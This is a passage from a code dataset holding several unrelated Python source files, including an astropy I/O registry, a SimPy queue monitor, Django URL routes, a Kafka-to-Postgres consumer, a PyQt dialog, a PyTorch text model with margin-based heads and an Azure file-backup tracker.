sys\n\nfrom ..utils import OrderedDict\n\n__all__ = ['register_reader', 'register_writer', 'register_identifier',\n 'identify_format', 'get_reader', 'get_writer', 'read', 'write']\n\n_readers = OrderedDict()\n_writers = OrderedDict()\n_identifiers = OrderedDict()\n\n\ndef register_reader(data_format, data_class, function, force=False):\n \"\"\"\n Register a reader function.\n\n Parameters\n ----------\n data_format : string\n The data type identifier. This is the string that will be used to\n specify the data type when reading.\n data_class : classobj\n The class of the object that the reader produces\n function : function\n The function to read in a data object.\n force : bool\n Whether to override any existing function if already present.\n \"\"\"\n\n if not (data_format, data_class) in _readers or force:\n _readers[(data_format, data_class)] = function\n else:\n raise Exception('Reader for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef register_writer(data_format, data_class, function, force=False):\n \"\"\"\n Register a table writer function.\n\n Parameters\n ----------\n data_format : string\n The data type identifier. This is the string that will be used to\n specify the data type when writing.\n data_class : classobj\n The class of the object that can be written\n function : function\n The function to write out a data object.\n force : bool\n Whether to override any existing function if already present.\n \"\"\"\n\n if not (data_format, data_class) in _writers or force:\n _writers[(data_format, data_class)] = function\n else:\n raise Exception('Writer for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef register_identifier(data_format, data_class, identifier, force=False):\n \"\"\"\n Associate an identifier function with a specific data type.\n\n Parameters\n ----------\n data_format : str\n The data type identifier. This is the string that is used to\n specify the data type when reading/writing.\n data_class : classobj\n The class of the object that can be written\n identifier : function\n A function that checks the argument specified to `read` or `write` to\n determine whether the input can be interpreted as a table of type\n `data_format`. This function should take the following arguments:\n\n - `origin`: A string `read` or `write` identifying whether\n the file is to be opened for reading or writing.\n - `path`: The path to the file.\n - `fileobj`: An open file object to read the file's contents, or\n `None` if the file could not be opened.\n - `*args`: A list of positional arguments to the `read` or\n `write` function.\n - `**kwargs`: A list of keyword arguments to the `read` or\n `write` function.\n\n One or both of `path` or `fileobj` may be `None`. If they are\n both `None`, the identifier will need to work from `args[0]`.\n\n The function should return True if the input can be identified\n as being of format `data_format`, and False otherwise.\n force : bool\n Whether to override any existing function if already present.\n\n Examples\n --------\n\n To set the identifier based on extensions, for formats that take a\n filename as a first argument, you can do for example::\n\n >>> def my_identifier(*args, **kwargs):\n ... return (isinstance(args[0], basestring) and\n ... 
args[0].endswith('.tbl'))\n >>> register_identifier('ipac', Table, my_identifier)\n \"\"\"\n\n if not (data_format, data_class) in _identifiers or force:\n _identifiers[(data_format, data_class)] = identifier\n else:\n raise Exception('Identifier for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef identify_format(origin, data_class_required, path, fileobj, args, kwargs):\n # Loop through identifiers to see which formats match\n valid_formats = []\n for data_format, data_class in _identifiers:\n if data_class is data_class_required:\n if _identifiers[(data_format, data_class)](\n origin, path, fileobj, *args, **kwargs):\n valid_formats.append(data_format)\n\n return valid_formats\n\n\ndef get_reader(data_format, data_class):\n if (data_format, data_class) in _readers:\n return _readers[(data_format, data_class)]\n else:\n raise Exception('No reader defined for format {0!r} and class '\n '{1!r}'.format(data_format, data_class.__name__))\n\n\ndef get_writer(data_format, data_class):\n if (data_format, data_class) in _writers:\n return _writers[(data_format, data_class)]\n else:\n raise Exception('No writer defined for format {0!r} and class '\n '{1!r}'.format(data_format, data_class.__name__))\n\n\ndef read(cls, *args, **kwargs):\n \"\"\"\n Read in data\n\n The arguments passed to this method depend on the format\n \"\"\"\n\n if 'format' in kwargs:\n format = kwargs.pop('format')\n else:\n format = None\n\n ctx = None\n try:\n if format is None:\n path = None\n fileobj = None\n\n if len(args):\n if isinstance(args[0], basestring):\n from ..utils.data import get_readable_fileobj\n path = args[0]\n try:\n ctx = get_readable_fileobj(args[0], encoding='binary')\n fileobj = ctx.__enter__()\n except Exception as e:\n fileobj = None\n else:\n args = [fileobj] + list(args[1:])\n elif hasattr(args[0], 'read'):\n path = None\n fileobj = args[0]\n\n format = _get_valid_format(\n 'read', cls, path, fileobj, args, kwargs)\n\n reader = get_reader(format, cls)\n table = reader(*args, **kwargs)\n\n if not isinstance(table, cls):\n raise TypeError(\n \"reader should return a {0} instance\".format(cls.__name__))\n finally:\n if ctx is not None:\n ctx.__exit__(*sys.exc_info())\n\n return table\n\n\ndef write(data, *args, **kwargs):\n \"\"\"\n Write out data\n\n The arguments passed to this method depend on the format\n \"\"\"\n\n if 'format' in kwargs:\n format = kwargs.pop('format')\n else:\n format = None\n\n if format is None:\n path = None\n fileobj = None\n if len(args):\n if isinstance(args[0], basestring):\n path = args[0]\n fileobj = None\n elif hasattr(args[0], 'read'):\n path = None\n fileobj = args[0]\n\n format = _get_valid_format(\n 'write', data.__class__, path, fileobj, args, kwargs)\n\n writer = get_writer(format, data.__class__)\n writer(data, *args, **kwargs)\n\n\ndef _get_valid_format(mode, cls, path, fileobj, args, kwargs):\n \"\"\"\n Returns the first valid format that can be used to read/write the data in\n question. Mode can be either 'read' or 'write'.\n \"\"\"\n\n if mode == 'read':\n funcs = _readers\n elif mode == 'write':\n funcs = _writers\n\n valid_formats = identify_format(mode, cls, path, fileobj, args, kwargs)\n\n if len(valid_formats) == 0:\n raise Exception(\n \"Format could not be identified. 
\",\n \"Valid formats are {0}\".format(\n ', '.join(sorted(x[0] for x in funcs))))\n elif len(valid_formats) > 1:\n raise Exception(\n \"Format is ambiguous - options are: {0}\".format(\n ', '.join(sorted(valid_formats))))\n\n return valid_formats[0]\n","repo_name":"RayPlante/astropy","sub_path":"astropy/io/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"72323052000","text":"# The workaround I am currently using involves:\n# 1) Inheriting a new class from simpy.Store\n# 2) Patching _do_put and _do_get to include custom call backs\n# 3) Add tracking and reporting methods\n\nimport simpy\nfrom collections import defaultdict\n\n\n\ndef condense(queue):\n return {\n 'cumulative_item_rec': queue._cumulative_item_rec,\n 'cumulative_time_rec': queue._cumulative_time_rec,\n 'item_time_dict': queue._item_time_dict\n }\n\nclass QueueCount(object):\n def __init__(self, env, initial_count=0):\n self._env = env\n self.items = []\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.Store._do_put method override\n def add(self):\n self.items.append(1)\n self._update_tracking()\n\n # simpy.Store._do_get method override\n def remove(self):\n if self.items:\n self.items.pop(0)\n self._update_tracking()\n\n def reset_tracking(self):\n self._last_reset = self._env.now\n self._last_time = self._env.now\n self._weighted_items = 0.0\n\n self._item_rec = []\n self._time_rec = []\n self._item_time_dict = defaultdict(int)\n self._item_time_dict[self._last_value] = 0\n self._update_tracking()\n\n def _update_tracking(self):\n if self._env.now > self._last_time or len(self._item_rec) == 0:\n time_delta = self._env.now - self._last_time\n self._weighted_items += time_delta * float(self._last_value)\n self._item_rec.append(self._last_value)\n self._time_rec.append(time_delta)\n self._item_time_dict[self._last_value] += time_delta\n self._last_value = len(self.items)\n self._last_time = self._env.now\n if len(self._cumulative_item_rec) == 0:\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n if self._last_time != self._cumulative_time_rec[-1]:\n self._cumulative_item_rec.append(self._cumulative_item_rec[-1])\n self._cumulative_time_rec.append(self._last_time)\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n self._cumulative_item_rec.pop(-1)\n self._cumulative_item_rec.append(self._last_value)\n\n # def add(self):\n # self.update_tracking(self.count + 1)\n\n # def update_tracking(self, new_count):\n # delta_t = self.env.now - self.last_time\n # self.time_records[self.count] = self.time_records.get(self.count, 0) + delta_t\n\n # self.count = new_count\n # self.last_time = self.env.now\n\n # def remove(self):\n # self.update_tracking(self.count - 1)\n\n\nclass MonitoredStore(simpy.Store):\n def __init__(self, env, capacity=float('inf')):\n super(MonitoredStore, self).__init__(env, capacity)\n\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.Store._do_put method override\n def _do_put(self, event):\n if len(self.items) < self._capacity:\n self.items.append(event.item)\n event.succeed()\n self._update_tracking()\n\n # simpy.Store._do_get method override\n def _do_get(self, event):\n if 
self.items:\n event.succeed(self.items.pop(0))\n self._update_tracking()\n\n def reset_tracking(self):\n self._last_reset = self._env.now\n self._last_time = self._env.now\n self._weighted_items = 0.0\n\n self._item_rec = []\n self._time_rec = []\n self._item_time_dict = defaultdict(int)\n self._item_time_dict[self._last_value] = 0\n self._update_tracking()\n\n def _update_tracking(self):\n if self._env.now > self._last_time or len(self._item_rec) == 0:\n time_delta = self._env.now - self._last_time\n self._weighted_items += time_delta * float(self._last_value)\n self._item_rec.append(self._last_value)\n self._time_rec.append(time_delta)\n self._item_time_dict[self._last_value] += time_delta\n self._last_value = len(self.items)\n self._last_time = self._env.now\n if len(self._cumulative_item_rec) == 0:\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n if self._last_time != self._cumulative_time_rec[-1]:\n self._cumulative_item_rec.append(self._cumulative_item_rec[-1])\n self._cumulative_time_rec.append(self._last_time)\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n self._cumulative_item_rec.pop(-1)\n self._cumulative_item_rec.append(self._last_value)\n\n @property\n def avg_value(self):\n try:\n if self._env.now > self._time_rec[-1]:\n self._update_tracking()\n except Exception:\n self._update_tracking()\n\n time_delta = float(self._env.now - self._last_reset)\n if time_delta == 0:\n time_delta = 1\n\n return sum(x * y for (x, y) in zip(self._time_rec, self._item_rec)) / time_delta\n\n @property\n def time_series(self):\n self._update_tracking()\n string = 'Time\\tValue\\n'\n for time, value in zip(self._cumulative_time_rec, self._cumulative_item_rec):\n string += '%f\\t%d\\n' % (time, value)\n\n return string\n\n def print_stats(self):\n self._update_tracking()\n total = float(sum(list(self._item_time_dict.values())))\n if total == 0:\n total = 1\n avg = 0.0\n for index, key in enumerate(sorted(self._item_time_dict.keys())):\n print('%d -> %f%%' % (key, 100 * self._item_time_dict[key] / total))\n avg += key * self._item_time_dict[key] / total\n print('Weighted Avg: %f' % avg)\n print('Cumulated Avg: %f' % self.avg_value)\n\n\nclass MonitoredFilterStore(simpy.FilterStore, MonitoredStore):\n def __init__(self, env, capacity=float('inf')):\n super(MonitoredFilterStore, self).__init__(env, capacity)\n\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.FilterStore._do_get method override\n def _do_get(self, event):\n for item in self.items:\n if event.filter(item):\n self.items.remove(item)\n event.succeed(item)\n break\n\n self._update_tracking()\n\n return True\n\n\nif __name__ == '__main__':\n q = MonitoredStore(simpy.Environment())\n q.print_stats()\n\n p = MonitoredFilterStore(simpy.Environment())\n p.print_stats()\n","repo_name":"JeremyBYU/uas-package","sub_path":"simuas/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36805762243","text":"\"\"\"svportal URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf.urls import url,include\nfrom django.contrib.auth import logout\nfrom django.urls import path,re_path\nfrom svapp.views import (QuizListView,StudentInterestsView,TakenQuizListView,QuizResultsView,\n QuizChangeListView,QuizCreateView,QuizUpdateView,QuizDeleteView,QuizTeacherResultsView,QuestionDeleteView,\n AddQuestionsView)\nfrom svapp import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index),\n url(r'^index/$', views.index),\n url(r'^adm/$', views.adm),\n url(r'^student/$', views.student),\n url(r'^teacher/$', views.teacher),\n url(r'^treg/',views.teacher_reg),\n url(r'^tlog/',views.teacher_log),\n url(r'^sreg/',views.student_reg),\n url(r'^slog/', views.student_log),\n url(r'^log/', views.login),\n url(r'^logout/$',views.logout_view),\n url(r'^adds/',views.add_student),\n url(r'^addt/',views.add_teacher),\n url(r'^comment/',views.User_comment_view),\n url(r'^com/',views.Student_comment_view),\n url(r'^comments/',views.comments),\n url(r'^show/', views.show),\n url(r'^sdetails/',views.sdetails),\n url(r'^tdetails/',views.tdetails),\n url(r'^subdetails/', views.subject_details),\n url(r'^subdelete/(?P\\d+)/', views.subject_delete),\n url(r'^subupdate/(?P\\d+)/', views.subject_update),\n url(r'^dels/(?P\\d+)/', views.delete_s),\n url(r'^delt/(?P\\d+)/', views.delete_t),\n url(r'^delc/(?P\\d+)/', views.delete_c),\n url(r'^delsc/(?P\\d+)/', views.delete_sc),\n url(r'^ups/(?P\\d+)/',views.StudentUpdate),\n url(r'^update_s/(?P\\d+)/',views.S_Update),\n url(r'^update_t/(?P\\d+)/',views.T_Update),\n url(r'^upt/(?P\\d+)/',views.TeacherUpdate),\n url(r'^search_s/',views.Search_Student),\n url(r'^search_t/',views.Search_Teacher),\n url(r'^search_a/',views.Search_Assessments),\n url(r'^search_q/',views.Search_Quiz),\n url(r'^easy/',views.easy),\n url(r'^medium/',views.medium),\n url(r'^hard/',views.hard),\n url(r'^write/', views.write),\n path('accounts/', include('django.contrib.auth.urls')),\n url(r'^addprofile/(?P\\d+)/',views.ProfileUpdate, name='addprofile'),\n url(r'^quiz_list/',QuizListView.as_view(), name='quiz_list'),\n url(r'^interests/',StudentInterestsView.as_view(), name='student_interests'),\n url(r'^taken/', TakenQuizListView.as_view(), name='taken_quiz_list'),\n url(r'^quiztake/(?P\\d+)/$', views.take_quiz, name='take_quiz'),\n url(r'^quiz/(?P\\d+)/studentresults/$', QuizResultsView.as_view(), name='student_quiz_results'),\n\n url(r'^quiz_change_list/', QuizChangeListView.as_view(), name='quiz_change_list'),\n url(r'^quiz/add/', QuizCreateView.as_view(), name='quiz_add'),\n url(r'^quiz/(?P\\d+)/$', QuizUpdateView.as_view(), name='quiz_change'),\n url(r'^quiz/(?P\\d+)/delete/$', QuizDeleteView.as_view(), name='quiz_delete'),\n url(r'^quiz/(?P\\d+)/results/$', QuizTeacherResultsView.as_view(), name='quiz_results'),\n url(r'^quiz/(?P\\d+)/question/add/$', views.question_add, name='question_add'),\n url(r'^quiz/(?P\\d+)/question/(?P\\d+)/$', views.question_change, name='question_change'),\n url(r'^quiz/(?P\\d+)/question/(?P\\d+)/delete/$', 
QuestionDeleteView.as_view(), name='question_delete'),\n\n url(r'^addquestions/', AddQuestionsView.as_view(), name='addquestions'),\n url(r'^addsubjects/',views.subject_add, name='addsubjects'),\n url(r'^qdelete/(?P.*)/',views.question_delete, name='q_delete'),\n\n] +static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"abeedshaik786/kishore_task1","sub_path":"svportal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"837672772","text":"import os\n\nfrom classes.PostgresPC import PostgresPC\n\nenv_vars = {\n \"config_path\": os.getenv(\"config_path\"),\n \"config_section\": os.getenv(\"config_section\"),\n}\n\nnew_c = PostgresPC(**env_vars)\n\nsql = \"INSERT INTO twitter_users(user_id, user_name, user_location, account_created_at, statuses_count, favorites_count,\\\n followers_count, friends_count, verified) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s)\\\n ON CONFLICT (user_id) DO NOTHING;\"\n\ntry:\n while True:\n msg = new_c.consumer.poll(0.1)\n\n if msg is None:\n continue\n\n elif msg.error() is not None:\n print(f\"Error occured: {str(msg.error())}\")\n\n else:\n new_user = new_c.decode_msg(msg)\n print(f\"Received user:\\n{new_user}\")\n\n row_values = (\n new_user[\"id_str\"],\n new_user[\"user_name\"],\n new_user[\"user_location\"],\n new_user[\"account_created_at\"],\n new_user[\"statuses_count\"],\n new_user[\"favorites_count\"],\n new_user[\"followers_count\"],\n new_user[\"friends_count\"],\n new_user[\"verified\"],\n )\n\n try:\n new_c.execute_statement(sql, row_values)\n print(\"Persisted user to DB\")\n except Exception as e:\n print(f\"Exception: {e}\")\n\nexcept KeyboardInterrupt:\n pass\n\nfinally:\n new_c.consumer.close()\n","repo_name":"janstrohschein/KOARCH","sub_path":"Big_Data_Platform/Docker/DB/Postgres/src/1c_persist_to_postgres.py","file_name":"1c_persist_to_postgres.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"39812749154","text":"# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets\nfrom sys import platform as _platform\n\nclass AddBatchlocationDialog(QtWidgets.QDialog):\n def __init__(self, parent):\n super(QtWidgets.QDialog, self).__init__(parent)\n # create dialog screen for each parameter in curr_params\n \n self.parent = parent\n self.view = self.parent.batchlocations_view \n self.model = self.parent.batchlocations_model\n self.batchlocations = self.parent.tools_widget.batchlocations\n self.locationgroups = self.parent.tools_widget.locationgroups\n self.statusbar = self.parent.statusBar() \n \n self.append_mode = False\n parent_type = None\n self.child_item = False\n self.row = False\n \n if (not len(self.view.selectedIndexes())):\n # if nothing selected\n self.append_mode = True \n elif (self.view.selectedIndexes()[0].parent().row() == -1):\n # if parent row is selected\n self.row = self.view.selectedIndexes()[0].row()\n self.index = None\n parent_type = self.batchlocations[self.locationgroups[self.row][0]][0]\n else:\n self.row = self.view.selectedIndexes()[0].parent().row()\n self.index = self.view.selectedIndexes()[0].row()\n parent_type = self.batchlocations[self.locationgroups[self.row][self.index]][0]\n self.child_item = True\n \n self.setWindowTitle(self.tr(\"Add batch location\"))\n\n 
vbox = QtWidgets.QVBoxLayout()\n hbox0 = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel(self.tr(\"Select type:\"))\n hbox0.addWidget(label)\n\n batchlocation_types = []\n batchlocation_types.append(\"BatchClean\") \n batchlocation_types.append(\"BatchTex\")\n batchlocation_types.append(\"Buffer\") \n #batchlocation_types.append(\"InlinePECVD\")\n batchlocation_types.append(\"IonImplanter\") \n batchlocation_types.append(\"PlasmaEtcher\")\n batchlocation_types.append(\"PrintLine\") \n batchlocation_types.append(\"SingleSideEtch\") \n #batchlocation_types.append(\"SpatialALD\")\n batchlocation_types.append(\"TubeFurnace\")\n batchlocation_types.append(\"TubePECVD\")\n batchlocation_types.append(\"WaferBin\")\n batchlocation_types.append(\"WaferSource\")\n batchlocation_types.append(\"WaferStacker\") \n batchlocation_types.append(\"WaferUnstacker\") \n\n self.batchlocation_types_combo = QtWidgets.QComboBox(self)\n for i in batchlocation_types:\n self.batchlocation_types_combo.addItem(i)\n\n if (parent_type):\n for i, value in enumerate(batchlocation_types):\n if (parent_type == value):\n self.batchlocation_types_combo.setCurrentIndex(i)\n continue\n\n hbox0.addWidget(self.batchlocation_types_combo)\n vbox.addLayout(hbox0)\n\n hbox1 = QtWidgets.QHBoxLayout()\n \n label = QtWidgets.QLabel(self.tr(\"name\"))\n hbox1.addWidget(label)\n\n self.name_edit = QtWidgets.QLineEdit(\"new\")\n hbox1.addWidget(self.name_edit) \n\n if (self.child_item):\n hbox2 = QtWidgets.QHBoxLayout()\n \n label = QtWidgets.QLabel(self.tr(\"create_copy\"))\n hbox2.addWidget(label)\n\n self.copy_checkbox = QtWidgets.QCheckBox()\n self.copy_checkbox.setChecked(True)\n hbox2.addWidget(self.copy_checkbox) \n\n ### Buttonbox for ok or cancel ###\n buttonbox = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel)\n buttonbox.accepted.connect(self.read)\n buttonbox.rejected.connect(self.reject)\n if _platform == \"linux\" or _platform == \"linux2\":\n buttonbox.layout().setDirection(QtWidgets.QBoxLayout.RightToLeft) \n \n vbox.addLayout(hbox1)\n if (self.child_item): vbox.addLayout(hbox2)\n vbox.addWidget(buttonbox)\n\n self.setLayout(vbox) \n\n def read(self):\n \n reindex_locationgroups = self.parent.tools_widget.reindex_locationgroups\n load_definition = self.parent.tools_widget.load_definition\n generate_batchconnections = self.parent.tools_widget.generate_batchconnections\n reset_cassetteloops = self.parent.cassetteloops_widget.reset_cassetteloops\n reset_operators = self.parent.operators_widget.reset_operators\n reset_technicians = self.parent.technicians_widget.reset_technicians\n\n if (self.append_mode): # if nothing was selected\n self.selected_batchlocation_number = len(self.batchlocations)\n reset_cassetteloops(self.selected_batchlocation_number)\n reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups.append([0])\n self.row = len(self.locationgroups)-1\n elif (self.index == None): # if parent item was selected \n self.selected_batchlocation_number = self.locationgroups[self.row][0]\n reset_cassetteloops(self.selected_batchlocation_number)\n reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups.insert(self.row,[0]) \n else: # if child item was selected \n self.selected_batchlocation_number = self.locationgroups[self.row][self.index]\n reset_cassetteloops(self.selected_batchlocation_number)\n 
reset_operators(self.selected_batchlocation_number)\n reset_technicians(self.selected_batchlocation_number) \n self.locationgroups[self.row].insert(self.index,0) \n\n new_dict = {}\n if (self.child_item): # copy previously selected batchlocation\n if (self.copy_checkbox.isChecked()): # if user selected this option\n new_dict.update(self.batchlocations[self.locationgroups[self.row][self.index+1]][1])\n\n # insert new batch location with selected name\n input_string = str(self.name_edit.text()) \n new_dict.update({'name' : input_string})\n self.batchlocations.insert(self.selected_batchlocation_number,\n [self.batchlocation_types_combo.currentText(), new_dict])\n \n # do a bit of housekeeping, now that batchlocations has changed\n reindex_locationgroups()\n load_definition(False)\n generate_batchconnections() # generate new connections list\n\n # re-expand parent item in view \n index = self.model.index(self.row, 0)\n self.view.setExpanded(index, True)\n \n if (self.child_item): # select newly created item in view\n parent = self.model.index(self.row, 0)\n index = self.model.index(self.index, 0, parent)\n self.view.setCurrentIndex(index)\n \n self.statusbar.showMessage(self.tr(\"Batch location added\"),3000)\n self.accept()","repo_name":"slierp/Discrete-event-simulation-for-solar-cell-production","sub_path":"desc-pro/dialogs/AddBatchlocationDialog.py","file_name":"AddBatchlocationDialog.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"2599221898","text":"import torch.nn as nn\nimport transformers\n\nfrom .head import AdaCos, ArcFace, CosFace\n\n\nclass ShopeeTextModel(nn.Module):\n def __init__(\n self,\n n_classes,\n device,\n model_name=\"bert-base-uncased\",\n pooling=\"mean_pooling\",\n use_fc=False,\n fc_dim=512,\n dropout=0.0,\n loss_module=\"softmax\",\n s=30.0,\n margin=0.50,\n ls_eps=0.0,\n theta_zero=0.785,\n ):\n \"\"\"\n :param n_classes:\n :param model_name: name of model from pretrainedmodels\n e.g. 
resnet50, resnext101_32x4d, pnasnet5large\n :param pooling: One of ('SPoC', 'MAC', 'RMAC', 'GeM', 'Rpool', 'Flatten', 'CompactBilinearPooling')\n :param loss_module: One of ('arcface', 'cosface', 'softmax')\n \"\"\"\n super(ShopeeTextModel, self).__init__()\n\n self.transformer = transformers.AutoModel.from_pretrained(model_name)\n self.final_in_features = self.transformer.config.hidden_size\n\n self.pooling = pooling\n self.use_fc = use_fc\n\n if use_fc:\n self.dropout = nn.Dropout(p=dropout)\n self.fc = nn.Linear(self.final_in_features, fc_dim)\n self.bn = nn.BatchNorm1d(fc_dim)\n self.relu = nn.ReLU()\n self._init_params()\n self.final_in_features = fc_dim\n\n self.loss_module = loss_module\n if loss_module == \"arcface\":\n self.final = ArcFace(\n self.final_in_features,\n n_classes,\n s=s,\n m=margin,\n easy_margin=False,\n ls_eps=ls_eps,\n device=device,\n )\n elif loss_module == \"cosface\":\n self.final = CosFace(\n self.final_in_features, n_classes, s=s, m=margin, device=device\n )\n elif loss_module == \"adacos\":\n self.final = AdaCos(\n self.final_in_features, n_classes, m=margin, theta_zero=theta_zero\n )\n else:\n self.final = nn.Linear(self.final_in_features, n_classes)\n\n def _init_params(self):\n nn.init.xavier_normal_(self.fc.weight)\n nn.init.constant_(self.fc.bias, 0)\n nn.init.constant_(self.bn.weight, 1)\n nn.init.constant_(self.bn.bias, 0)\n\n def forward(self, input_ids, attention_mask, label):\n feature = self.extract_features(input_ids, attention_mask)\n if self.loss_module == \"arcface\":\n logits = self.final(feature, label)\n else:\n logits = self.final(feature)\n return logits\n\n def extract_features(self, input_ids, attention_mask):\n x = self.transformer(input_ids=input_ids, attention_mask=attention_mask)\n\n features = x[0]\n features = features[:, 0, :]\n\n if self.use_fc:\n features = self.fc(features)\n features = self.bn(features)\n features = self.relu(features)\n features = self.dropout(features)\n return features\n","repo_name":"mammadliafaq/master-thesis_web-app","sub_path":"app/models/text_model.py","file_name":"text_model.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27935000481","text":"import os, time, json\nfrom config import config\nfrom log import setup_logger\nfrom azStorage import AZBlobStorage\nfrom azCosmosContainer import AzCosmosContainer\n\nlogger=setup_logger(__name__)\n\nclass FileTracker:\n \"\"\"Tracks assigned folder for add, delete, and file changes. 
\n When detected executes upload to AZ Storage and places a record of files in CosmosDB of blob storage.\n \"\"\"\n def __init__(self, \n working_dir: str, t_sec: str, conn_str: str, sto_container: str, \n db_name: str, uri: str, key: str, db_container: str\n ):\n \"\"\"Constructs all the necessary attributes: FileTracker object.\n\n Args:\n working_dir (str): Example: 'c:\\\\Users\\\\User123\\\\backup-folder'\n t_sec (str): time in seconds\n conn_str (str): Azure Blob Storage Connection String\n sto_container (str): Storage Actual Name\n db_name (str): Database Name in Azure CosmosDB\n uri (str): URI for CosmosDB connection\n key (str): Unique Key as Per Azure Acct.\n db_container (str): CosmosDB Actual Name\n \"\"\"\n self.working_dir = working_dir\n self.t_sec = int(t_sec) \n self.record_name = 'after-before-record.txt'\n \n # Blob Storage\n self.sto_container = sto_container\n self.conn_str = conn_str\n self.storage_resource = AZBlobStorage(\n working_dir=self.working_dir,conn_str=self.conn_str, \n container=self.sto_container)\n \n # File Track DB\n self.db_name = db_name\n self.uri = uri\n self.key = key\n self.db_container = db_container\n self.db_resource = AzCosmosContainer(\n uri=self.uri, key=self.key, \n database_name=self.db_name, container_name=self.db_container)\n self.db_load = self.db_resource.create_load_db\n self.db_container = self.db_resource.create_load_container\n \n \n @property \n def file_list(self) -> list:\n \"\"\"Creates a list of all files.\n Lists: Pwd and Sub-folder files, including hidden. \n \n Returns:\n list: A list of path/file_name for working_dir\n \"\"\"\n return [os.path.join(dirpath, file).replace(self.working_dir, \"\") for (\n dirpath, dirnames, filenames) in os.walk(self.working_dir) for file in filenames]\n \n \n @property\n def file_time_list(self) -> dict:\n \"\"\"Creates a Dictionary of filenames as key and os time for values\n\n Returns:\n dict: {\"path/filename\": float}\n \"\"\"\n file_list = self.file_list\n time_list = [os.path.getmtime(self.working_dir+file) for file in file_list]\n \n return dict(zip(file_list, time_list))\n \n \n def file_select_times(self, file_list: list, after_local: dict) ->dict:\n \"\"\"Updates after_local dictionary items\n\n Args:\n file_list (list): List of files [\"path/filename\"]\n after_local (dict): Existing file time list\n\n Returns:\n dict: Updated after_local\n \"\"\"\n time_list = [os.path.getmtime(self.working_dir+file) for file in file_list]\n update_after = dict(zip(file_list, time_list))\n after_local.update(update_after)\n\n return after_local\n \n \n @property\n def before_save_local(self) -> dict:\n \"\"\"Loads file name self.record_name\n\n Returns:\n dict: {\"filename\": filetime}\n \"\"\"\n try: \n with open(self.record_name, 'r') as data:\n out = json.loads(data.read())\n\n except Exception as err:\n logger.error(\"Failed: %s Issue:\" % err)\n\n return out\n \n \n def after_save_local(self, save:dict) ->None:\n \"\"\"Saves self.record_name\n\n Args:\n save (dict): {\"filename\": filetime}\n \"\"\"\n record = json.dumps(save)\n try:\n with open(self.record_name, 'w') as data:\n data.write(record)\n\n except Exception as err:\n logger.error(\"Failed: %s Issue\" % err)\n \n \n def delete_files(self, file_list:dict) ->None: \n \"\"\"Deletes Local Files.\n\n Args:\n file_list (dict): {\"filename\": filetime}\n \"\"\"\n for file in file_list:\n\n # Format path\n file_path = os.path.join(self.working_dir, file)\n # If file exists, delete it.\n if os.path.isfile(path=file_path):\n 
